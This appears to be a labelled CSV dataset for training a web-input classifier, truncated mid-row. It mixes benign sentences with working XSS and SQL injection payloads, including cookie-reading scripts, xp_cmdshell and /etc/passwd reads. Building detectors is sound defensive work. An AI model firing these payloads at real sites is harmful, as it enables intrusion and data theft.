onpointerup=alert(1)>XSS</li>,1,XSS,6378 +"1"" ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ""gcnq"" like ""gcnq",2,SQLi,17918 +<object onpointerout=alert(1)>XSS</object>,1,XSS,2168 +"-9007 ) as gill where 6462 = 6462 union all select 6462,6462,6462,6462,6462,6462,6462,6462,6462#",2,SQLi,20135 +"<style>@keyframes x{}</style><multicol style=""animation-name:x"" onanimationstart=""alert(1)""></multicol>",1,XSS,3657 +"<style>:target {color:red;}</style><rb id=x style=""transition:color 1s"" ontransitionend=alert(1)></rb>",1,XSS,7947 +1' ) as jxtg where 1071 = 1071 and sleep ( 5 ) --,2,SQLi,21739 +"<SCRIPT ="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,4811 +<header id=x tabindex=1 onfocus=alert(1)></header>,1,XSS,1828 +It's not clear how Twitter plans to select its test users.,0,normal,25896 +1' ) where 2840 = 2840,2,SQLi,20083 +"-6170 ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,13020 +"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 2 ) ) AND 'i' = 'i",2,SQLi,11855 +"From there, Sweetgreen delivers to that location at a select time.",0,normal,26112 +"1'+ ( select sxco where 1623 = 1623 union all select null,null--",2,SQLi,16468 +"1"" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""aixs"" = ""aixs",2,SQLi,12987 +"1"" and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""wtkx"" = ""wtkx",2,SQLi,13264 +Select the right tool for the task.,0,normal,24096 +&#39;&#88;&#83;&#83;&#39;&#41;>,1,XSS,1107 +"<spacer draggable=""true"" ondragleave=""alert(1)"">test</spacer>",1,XSS,5876 +1'+ ( select basp where 6953 = 6953,2,SQLi,19112 +"1 ) ) as ynzg where 1926 = 1926 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,14480 +"-3596' ) union all select 5349,5349,5349,5349,5349,5349#",2,SQLi,12167 +Show me where it's located.,0,normal,23243 +1) or pg_sleep(5)--,2,SQLi,11256 +"-5560"" ) ) or 7292 = 6184#",2,SQLi,18090 +"1"" ) as wvxt where 7321 = 7321 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,16675 +"1"" ) as kbjt where 2012 = 2012 and ( 5978 = 6898 ) *6898--",2,SQLi,12931 +Where's the best place to relax and unwind?,0,normal,23904 +"Their job — Ivry's job — was to eliminate targets, not select them.",0,normal,25314 +Article: Select items up to 20% off (through September 10).,0,normal,26313 +"1%"" ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,21537 +"<body onUnload body onUnload=""javascript:javascript:alert(1)""></body onUnload>",1,XSS,362 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( ""khuw"" like ""khuw",2,SQLi,15659 +-6015%' ) order by 1--,2,SQLi,17004 +"1"" ) as bksv where 5375 = 5375",2,SQLi,18699 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 9646 = 9646",2,SQLi,16168 +Select entree.,0,normal,24465 +"-8005"" ) union all select 5213,5213,5213,5213,5213--",2,SQLi,20847 +"-3452%' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = '",2,SQLi,16368 +"<video ondblclick=""alert(1)"">test</video>",1,XSS,8469 +Where's the missing piece of artwork?,0,normal,22724 +"<rtc onmouseenter=""alert(1)"">test</rtc>",1,XSS,2982 +; exec master..xp_cmdshell 'ping 10.10.1.2'--,2,SQLi,9976 +Select your wish.,0,normal,24902 +"-9871"" ) union all select 9082#",2,SQLi,16711 +"union select 1,load_file('/etc/passwd'),1,1,1;",2,SQLi,10035 +"<figure onkeydown=""alert(1)"" contenteditable>test</figure>",1,XSS,5702 +"<IMG SRC=""javascript:javascript:alert(1);"">",1,XSS,689 +"1"" ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ""cbck"" like ""cbck",2,SQLi,21407 +"<a target=""x"" href=""xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>",1,XSS,9015 +1' ) where 6305 = 6305 rlike ( select ( case when ( 8326 = 9749 ) then 1 else 0x28 end ) ) --,2,SQLi,13884 +"Up to 45% off select Power Tools, Hand Tools, and Accessories",0,normal,25170 +"<dfn onkeypress=""alert(1)"" contenteditable>test</dfn>",1,XSS,7862 +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus>,1,XSS,7885 +"-7409"" ) ) union all select 3145,3145,3145--",2,SQLi,13771 +"1"" ) ) as zemm where 3324 = 3324 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,19008 +"<script src=""data:\xCB\x8F,javascript:alert(1)""></script>",1,XSS,440 +1' and ( 1088 = 7530 ) *7530 and 'xkfu' = 'xkfu,2,SQLi,19092 +"1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,14359 +"1"" ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16657 +"<samp draggable=""true"" ondragend=""alert(1)"">test</samp>",1,XSS,5150 +1 ) ) as uqsi where 1644 = 1644 and 9198 = 9198--,2,SQLi,15143 +-7720 ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 8254 = 8254,2,SQLi,18666 +1%' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and '%' = ',2,SQLi,12439 +"<image draggable=""true"" ondragend=""alert(1)"">test</image>",1,XSS,2272 +"1' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 'xngr' = 'xngr",2,SQLi,12409 +"<style>@keyframes x{}</style><li style=""animation-name:x"" onanimationstart=""alert(1)""></li>",1,XSS,6825 +"1%' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( '%' = '",2,SQLi,22163 +"1%"" ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""%"" = """,2,SQLi,18271 +"<marquee oncopy=""alert(1)"" contenteditable>test</marquee>",1,XSS,8761 +"1 ) where 5261 = 5261 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,18736 +Calculate sums where applicable.,0,normal,23239 +"<section onmouseout=""alert(1)"">test</section>",1,XSS,4715 +"<pre draggable=""true"" ondragleave=""alert(1)"">test</pre>",1,XSS,3743 +"<style>@keyframes x{}</style><frame style=""animation-name:x"" onanimationend=""alert(1)""></frame>",1,XSS,2699 +<xss onpointerover=alert(1) style=display:block>XSS</xss>,1,XSS,92 +"<label draggable=""true"" ondragenter=""alert(1)"">test</label>",1,XSS,3383 +waitfor delay '0:0:5'#,2,SQLi,21207 +?playerready=alert(document.cookie),1,XSS,9842 +<select id=x tabindex=1 onactivate=alert(1)></select>,1,XSS,6563 +1 ) or sleep ( 5 ),2,SQLi,13463 +"<xss draggable=""true"" ondragenter=""alert(1)"" style=display:block>test</xss>",1,XSS,63 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></shadow>",1,XSS,4316 +"<head onmouseout=""alert(1)"">test</head>",1,XSS,7553 +"select * from users where id = 1 or ""{@"" or 1 = 1 -- 1",2,SQLi,11501 +"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">",1,XSS,903 +"-4305 ) ) ) union all select 2401,2401--",2,SQLi,12711 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10570 +RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=',2,SQLi,10230 +Select an item from the list by checking the checkbox.,0,normal,25612 +"<figure onmouseout=""alert(1)"">test</figure>",1,XSS,2532 +-5982' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'ikuh' = 'ikuh,2,SQLi,12989 +"<style>:target {color: red;}</style><address id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></address>",1,XSS,3920 +"-2912"" ) as eizh where 2223 = 2223 or make_set ( 1041 = 3056,3056 ) --",2,SQLi,17213 +\&quot;;alert(&apos;XSS&apos;);//,1,XSS,1374 +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus>,1,XSS,6968 +<xss onafterscriptexecute=alert(1)><script>1</script>,1,XSS,1 +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus>,1,XSS,7892 +))%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,10756 +"<div draggable=""true"" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd>",1,XSS,2529 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,10990 +select * from users where id = 1 <@<@ or 1 = 1 -- 1,2,SQLi,11582 +<body onpointerout=alert(1)>XSS</body>,1,XSS,5221 +"1"" ) as nixg where 4580 = 4580 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,21734 +"-6388'+ ( select 'jqld' where 8600 = 8600 union all select 8600,8600#",2,SQLi,12590 +"1"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,15354 +"-1170' union all select 4663,4663,4663,4663,4663,4663,4663,4663#",2,SQLi,17114 +"<i onkeydown=""alert(1)"" contenteditable>test</i>",1,XSS,3319 +"1' ) union all select null,null,null--",2,SQLi,21935 +select ( case when ( 3217 = 8421 ) then 3217 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,16398 +"<frameset onmouseenter=""alert(1)"">test</frameset>",1,XSS,7482 +<svg><data onload=alert(1)></data>,1,XSS,2482 +"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10825 +"<progress onbeforecopy=""alert(1)"" contenteditable>test</progress>",1,XSS,5108 +"1' union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,19807 +Sort cards.,0,normal,23026 +1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'obwn' = 'obwn,2,SQLi,14282 +"<rtc oncopy=""alert(1)"" contenteditable>test</rtc>",1,XSS,3895 +Join the music band as a guitarist.,0,normal,22945 +select ( case when ( 4006 = 1276 ) then 1 else 4006* ( select 4006 from master..sysdatabases ) end ) --,2,SQLi,18578 +""")) waitfor delay '0:0:20' --",2,SQLi,10843 +Where's the beach house?,0,normal,23521 +Select your path.,0,normal,24750 +1' ) ) and 9198 = 9198--,2,SQLi,20805 +"How to select all the photos in a folder or on your iPhoneThere is no ""Select All"" command in the Photos app, but you can select all the photos in a folder (or even all photos on an iPhone) in a slightly more manual way.1.",0,normal,26033 +1'+ ( select 'mdxt' where 2733 = 2733 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,15412 +"<sup onclick=""alert(1)"">test</sup>",1,XSS,3852 +"1"" ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,12640 +<menu onpointerenter=alert(1)>XSS</menu>,1,XSS,8378 +"<q onbeforecut=""alert(1)"" contenteditable>test</q>",1,XSS,5095 +"select * from users where id = '1' union select 1""!"",banner from v$version where rownum = 1 -- 1'",2,SQLi,11571 +<article onpointerenter=alert(1)>XSS</article>,1,XSS,6464 +"1'|| ( select 'kgfu' from dual where 2607 = 2607 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16273 +"<nav onmouseenter=""alert(1)"">test</nav>",1,XSS,5763 +Select a card.,0,normal,24762 +"<div draggable=""true"" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area>",1,XSS,3074 +"<tt onmousedown=""alert(1)"">test</tt>",1,XSS,5801 +"-1337"" ) union all select 7508--",2,SQLi,15759 +"<IMG SRC=""jav&#x0D;ascript:alert('');"">",1,XSS,5021 +"-3074' ) ) union all select 6131,6131,6131,6131,6131,6131,6131--",2,SQLi,20533 +"1"" where 9241 = 9241 union all select null#",2,SQLi,21547 +-2569' union all select 4484--,2,SQLi,13145 +"1'+ ( select 'ycsv' where 3628 = 3628 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,14593 +"))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337",2,SQLi,11171 +"-9697 ) union all select 3052,3052,3052,3052,3052,3052,3052,3052,3052--",2,SQLi,16488 +"<blockquote onmousedown=""alert(1)"">test</blockquote>",1,XSS,8023 +"-4233%"" ) or ( 8459 = 8459 ) *4906 and ( ""%"" = """,2,SQLi,14653 +<input4 onpointermove=alert(1)>XSS</input4>,1,XSS,8728 +1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'ukzb' = 'ukzb,2,SQLi,21518 +"<ul onmouseleave=""alert(1)"">test</ul>",1,XSS,4685 +"Whole Foods and Amazon announced that select organic turkeys will be available for $3.49 per pound and select antibiotic-free turkeys will be $6.993 per pound at Whole Foods starting tomorrow, Wednesday, November 14.",0,normal,25092 +"Select Entry Copy User ID or Copy Password, then paste these into the site's authentication dialog.",0,normal,25593 +"1%"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""%"" = """,2,SQLi,21020 +"The service was available only to users who subscribed to Ola's ""Select"" plan, which according to the company ""saw hundreds of thousands of new users opt for Select subscription, resulting in 3x growth"".",0,normal,25341 +COM: up to 70 percent off luxury labels Michael Kors: take an extra 25 percent off already reduced prices; through 7/4 M'oda 'Operandi: up to 70 percent off select designer styles; through 73/11 Neil J. Rodgers: 50 percent off sitewide; through 7/5 Of a Kind: 30 percent off select items; through 7/6 Old Navy: up to 50 percent off select items Parker NY: to 70 percent off select items (use code: LUCKYSTARS); through 53/2 Ramy Brook: 25 percent off select styles; through 7/4 Rebecca Taylor: 40 percent off sale items (use code: JULYSURPRISE); through 7/4 Rockport: up to 50 percent off and get 2 pairs of select styles for $753 Schutz: up to 50 percent off select styles Shopbop.,0,normal,26228 +"<script src=""//brutelogic.com.br&sol;1.js&num;",1,XSS,9199 +<button onBeforeEditFocus=javascript:alert(1)>,1,XSS,9548 +<svg><select onload=alert(1)></select>,1,XSS,8356 +"<b onbeforepaste=""alert(1)"" contenteditable>test</b>",1,XSS,2795 +"<style>@keyframes x{}</style><output style=""animation-name:x"" onanimationend=""alert(1)""></output>",1,XSS,8232 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--",2,SQLi,22498 +"1 ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 1164 = 1164",2,SQLi,16360 +ORDER BY 28#,2,SQLi,10195 +"1%"" ) union all select null,null,null--",2,SQLi,19824 +<br onpointerover=alert(1)>XSS</br>,1,XSS,2267 +<iframe onpointerleave=alert(1)>XSS</iframe>,1,XSS,2158 +"1'+ ( select pepf where 5071 = 5071 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,21195 +"(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'""",2,SQLi,11074 +"<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>",1,XSS,9225 +"<nav onpaste=""alert(1)"" contenteditable>test</nav>",1,XSS,3257 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))",2,SQLi,10629 +"<title draggable=""true"" ondragend=""alert(1)"">test</title>",1,XSS,2520 +<dd onpointerup=alert(1)>XSS</dd>,1,XSS,6497 +"or benchmark(10000000,MD5(1))#",2,SQLi,10055 +"1'|| ( select 'fdkl' where 4572 = 4572 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,17995 +"1' in boolean mode ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) #",2,SQLi,21188 +“><script>alert(“XSS”)</script>,1,XSS,9333 +"<embed onmousedown=""alert(1)"">test</embed>",1,XSS,7406 +"<style>:target {transform: rotate(180deg);}</style><bdi id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></bdi>",1,XSS,8659 +1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and 'dogx' = 'dogx,2,SQLi,12587 +"<style>@keyframes slidein {}</style><li style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></li>",1,XSS,8629 +"1' where 7190 = 7190 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,19193 +"-7568"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""jxge"" like ""jxge",2,SQLi,16596 +Select here.,0,normal,24447 +"-1641'|| ( select 'jfnu' where 7682 = 7682 union all select 7682,7682,7682--",2,SQLi,13190 +"<figcaption onkeyup=""alert(1)"" contenteditable>test</figcaption>",1,XSS,7752 +Where's the mindfulness workshop?,0,normal,23623 +"1' ) as siyk where 1514 = 1514 union all select null,null,null,null,null,null#",2,SQLi,13317 +Select wilt.,0,normal,24642 +-4768'|| ( select 'dded' from dual where 6499 = 6499 union all select 6499--,2,SQLi,20333 +"-5058%' union all select 6789,6789,6789,6789,6789#",2,SQLi,14881 +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus>,1,XSS,5461 +"1"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,12030 +"-6407' ) or elt ( 1631 = 4946,4946 ) and ( 'jpnz' = 'jpnz",2,SQLi,15698 +Check conditions where needed.,0,normal,23327 +1'|| ( select 'mlwj' from dual where 4247 = 4247 and 1702 = 8469 ) ||',2,SQLi,14710 +"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337"" LIKE ""1337",2,SQLi,11128 +Select your ideal date.,0,normal,24397 +;confirm('XSS')//1491b2as,1,XSS,9702 +She carefully selected her words for the speech.,0,normal,23929 +She'll select her jewelry.,0,normal,24297 +"1"" where 7022 = 7022",2,SQLi,16625 +Retrieve data where ID matches.,0,normal,23403 +Select your reflect.,0,normal,24940 +"<div style=""font-family:foo}color=red;"">XXX",1,XSS,657 +-6014' ) ) or ( 9860 = 4848 ) *4848 and ( ( 'qtge' = 'qtge,2,SQLi,20339 +Select the correct option.,0,normal,24241 +"-3438"" ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""nxiv"" = ""nxiv",2,SQLi,19566 +<svg/onload=alert(1),1,XSS,845 +"select * from users where id = 1 or "" ) {"" or 1 = 1 -- 1",2,SQLi,11733 +1'+ ( select qtyi where 7147 = 7147,2,SQLi,12923 +"1"" where 2462 = 2462 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,12070 +"ABC<div style=""x:\xE2\x80\x87expression(javascript:alert(1)"">DEF",1,XSS,455 +"<script ""a='>'"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,1499 +-5967 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) # lhoh,2,SQLi,13085 +"It also contains interesting communications from Bunsen and Professor Loebell, and select translations from the Kleine Schriften.",0,normal,25932 +Select your task.,0,normal,24816 +"1"" ) as cfed where 8220 = 8220 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,21826 +"1"" ) as mszg where 6184 = 6184 rlike sleep ( 5 ) --",2,SQLi,15662 +1 waitfor delay '0:0:10'--,2,SQLi,11662 +1' ) where 5280 = 5280 and 4595 = 4595#,2,SQLi,15506 +<dd id=x tabindex=1 onactivate=alert(1)></dd>,1,XSS,2797 +"1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""krxy"" = ""krxy",2,SQLi,21753 +"exp/*<XSS STYLE='no\xss:noxss(""*//*"");",1,XSS,9323 +"<samp onclick=""alert(1)"">test</samp>",1,XSS,2615 +"1 where 3410 = 3410 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13541 +1' ) ) ) and sleep ( 5 ) and ( ( ( 'vbck' like 'vbck,2,SQLi,22411 +"1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'maln' like 'maln",2,SQLi,21082 +"1' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'pqxe' like 'pqxe",2,SQLi,16041 +"1%' or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,18045 +"<optgroup onmouseup=""alert(1)"">test</optgroup>",1,XSS,4048 +"<style>@keyframes x{}</style><xmp style=""animation-name:x"" onanimationstart=""alert(1)""></xmp>",1,XSS,8605 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""%"" = """,2,SQLi,20868 +Insert drive.,0,normal,23003 +To ensure success with finer pitch requirements it may be necessary to reduce the stencil thickness or select a multi-level stencil.,0,normal,25235 +"<a href=""javascript:javascript:alert(1)""><event-source src=""data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"">",1,XSS,683 +1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) -- fyaq,2,SQLi,14529 +=' 'or' and '=' 'or',2,SQLi,9959 +if ( 5127 = 2829 ) select 5127 else drop function okos--,2,SQLi,18281 +I'm planning to pick up some essentials.,0,normal,23676 +"-9209%"" ) ) ) union all select 3736,3736,3736--",2,SQLi,22188 +"Simply go to your photo or attachment stack, select and upload.",0,normal,25513 +"<style>:target {transform: rotate(180deg);}</style><li id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></li>",1,XSS,2993 +<rt onpointerleave=alert(1)>XSS</rt>,1,XSS,7396 +"1 ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20513 +"1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,18116 +"1'+ ( select uzan where 4312 = 4312 and make_set ( 3129 = 9555,9555 ) ) +'",2,SQLi,16740 +"1' ) as uvxl where 6211 = 6211 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,20403 +"<th onmousedown=""alert(1)"">test</th>",1,XSS,8526 +"<slot onkeydown=""alert(1)"" contenteditable>test</slot>",1,XSS,4447 +Where did you find that serene retreat?,0,normal,23903 +"<plaintext onbeforecopy=""alert(1)"" contenteditable>test</plaintext>",1,XSS,5381 +Save up to 25% off select Grills and Pool Supplies,0,normal,25684 +To aid in the speedy dispatch of your order please select one of the delivery zones above.,0,normal,25249 +"1%"" ) ) or sleep ( 5 ) #",2,SQLi,15394 +"<style>:target {transform: rotate(180deg);}</style><colgroup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></colgroup>",1,XSS,2737 +"1"" where 3247 = 3247 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14809 +"<div id=""95""><svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,9101 +url(javascript:alert(''),1,XSS,7388 +"1, ( begin 